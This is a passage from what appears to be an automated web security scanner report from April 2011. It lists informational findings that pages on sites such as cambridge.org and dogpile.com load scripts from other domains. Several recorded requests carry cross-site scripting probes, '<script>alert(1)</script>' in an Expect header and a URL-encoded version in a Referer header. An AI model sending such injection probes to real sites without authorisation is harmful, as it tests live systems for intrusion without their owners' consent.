Path:	/uk/catalogue/viewBasket.asp

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.cambridge.org&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /uk/catalogue/viewBasket.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8753
Date: Fri, 01 Apr 2011 18:16:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Cambr
...[SNIP]...
<div id="verisign" style="float:left;">
<script src=https://seal.verisign.com/getseal?host_name=www.cambridge.org&size=S&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

12.27. http://www.carolwrightgifts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carolwrightgifts.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.carolwrightgifts.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carolwrightgifts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 15:36:46 GMT
Content-Length: 12866
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<br>
<script src=https://seal.verisign.com/getseal?host_name=www.carolwrightgifts.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

12.28. http://www.clairol.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clairol.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clairol.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:32:32 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

12.29. http://www.courtcareers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courtcareers.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.indeed.com/ads/apiresults.js
http://www.neutronstats.com/js/track.js
http://www.servedbyadbutler.com/adserve/;ID=152548;size=728x90;setID=133573;type=js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courtcareers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.7.67
Date: Fri, 01 Apr 2011 15:36:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie,Accept-Encoding
Content-Length: 8569

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

   <title>Page Not Found</title>


       <meta name="description" content="" />
   <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.indeed.com/ads/apiresults.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![if lt IE 4]>
<script src="http://www.servedbyadbutler.com/adserve/;ID=152548;size=728x90;setID=133573;type=js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script src="http://www.neutronstats.com/js/track.js"></script>
...[SNIP]...

12.30. http://www.covergirl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.covergirl.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:42:00 GMT
Server: Microsoft-IIS/6.0
X-Server: EW57
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

12.31. http://www.crosswalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crosswalk.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=120x90;pos=swnradio;tile=7;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=15x15;pos=rollover;tile=8;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=2x2;pos=feature_1;tile=4;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=secondbox;tile=3;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=sidebanner;tile=2;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=sponsor;tile=5;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=728x90;pos=footer;tile=6;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=728x90;pos=header;tile=1;dcopt=ist;ord=36508367?
http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=900x50;pos=sponsor;tile=9;ord=36508367?

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crosswalk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:42:40 GMT
Content-Length: 33297
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Jesus
...[SNIP]...
<div class="advertisement advertisement-728-90 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=728x90;pos=header;tile=1;dcopt=ist;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-300-250 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=sidebanner;tile=2;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-300-250 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=secondbox;tile=3;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-2-2 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=2x2;pos=feature_1;tile=4;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-300-250 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=300x250;pos=sponsor;tile=5;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-728-90 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=728x90;pos=footer;tile=6;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-120-90 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=120x90;pos=swnradio;tile=7;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-15-15 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=15x15;pos=rollover;tile=8;ord=36508367?"></script>
...[SNIP]...
<div class="advertisement advertisement-900-50 AdvertisementExtensions" ><script type="text/javascript" src="http://ad.doubleclick.net/adj/slm.crosswalk/home;sz=900x50;pos=sponsor;tile=9;ord=36508367?"></script>
...[SNIP]...

12.32. http://www.dogpile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET / HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.33. http://www.dogpile.com/dogpile/ws/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile/ws/about/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.34. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.35. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.36. http://www.dogpile.com/dogpile/ws/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile/ws/faq/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.37. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.38. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.39. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.40. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.41. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.42. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.43. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.44. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.45. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.46. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.47. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.48. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

12.49. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.50. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
